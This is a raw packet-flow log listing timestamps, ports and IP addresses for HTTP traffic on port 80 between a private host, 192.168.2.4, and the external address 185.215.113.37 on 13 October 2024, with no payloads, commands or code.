Oct 13, 2024 17:46:20.226072073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226078033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226088047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226095915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226095915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226103067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226113081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226135969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226155996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226160049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226160049 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226166964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226181030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226191044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226247072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226247072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226253986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226269960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226279974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226289034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.226311922 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.226739883 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227101088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227189064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227205992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227216959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227226019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227236986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227247000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227252960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227252960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227258921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227288961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227344990 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227355957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227365971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227376938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227401018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227401972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227411985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227423906 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227426052 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227435112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227447033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227448940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227448940 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227500916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227500916 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227525949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227539062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227549076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227579117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227588892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227607012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227617025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227627993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227628946 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227638960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227638960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227652073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227660894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227665901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.227689981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.227752924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.228950024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.228967905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.228980064 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.228990078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229001045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229010105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229022026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229043007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.229043007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.229192019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.229302883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229315042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.229588985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.335735083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.340573072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556412935 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556427956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556438923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556448936 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556459904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556493044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556500912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556519032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556530952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556540966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556551933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556560993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556561947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556561947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556571960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556580067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556582928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556628942 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556648970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556658983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556669950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556679964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556689978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556698084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556698084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556699038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556716919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556725979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556732893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556732893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556736946 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556749105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556760073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556770086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556771040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556786060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556792974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556822062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556826115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556843042 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556854010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556863070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556873083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.556879997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556879997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556910992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.556910992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680632114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680658102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680668116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680685997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680696964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680697918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680710077 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680722952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680737019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680778980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680778980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680804968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680838108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680846930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680856943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680883884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680883884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680897951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680908918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680919886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680932999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.680944920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.680978060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681057930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681077957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681088924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681107998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681157112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681168079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681173086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681180000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681202888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681263924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681267977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681276083 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681287050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681305885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681333065 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681343079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681355000 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681355000 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681365967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681379080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681386948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681387901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681399107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681410074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681416988 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681428909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681437016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681466103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681473017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681473017 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681478024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681515932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681551933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681565046 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681576967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681621075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681621075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681648970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681659937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681678057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681688070 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681699038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681701899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681713104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681719065 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681723118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681735992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681745052 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681746006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681756973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681766987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681782007 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681788921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681788921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681793928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681838036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681838036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681864023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681874037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681884050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681902885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681911945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681922913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681934118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681946039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681953907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681953907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681960106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681969881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.681977034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.681984901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682010889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682010889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682025909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682035923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682048082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682058096 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682089090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682090044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682090044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682100058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682111025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682148933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682148933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.682344913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.682382107 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.771137953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.771301985 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.771959066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.772099972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805164099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805176973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805190086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805201054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805211067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805224895 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805258036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805259943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805274010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805305004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805315018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805325031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805330992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805330992 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805336952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805352926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805402040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805413008 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805423021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805438995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805449009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805449963 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805449009 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805460930 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805469036 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805471897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805489063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805500031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805507898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805516958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805516958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805519104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805536985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805546999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805557966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805571079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805576086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805577040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805582047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805617094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805617094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805687904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805797100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805811882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805823088 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805831909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805839062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805844069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805883884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805883884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805907965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805917025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805927992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805942059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805952072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805969954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805980921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805980921 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.805980921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.805993080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806004047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806026936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806026936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806094885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806107044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806116104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806128979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806128979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806137085 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806149006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806155920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806155920 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806158066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806170940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806180954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806180954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806190968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806200981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806210995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806226969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806226969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806252956 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806262970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806274891 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806292057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806292057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806303024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806313038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806323051 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806329012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806329012 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 13, 2024 17:46:20.806334019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806344986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 13, 2024 17:46:20.806355000 CEST	80	49730	185.215.113.37	192.168.2.4
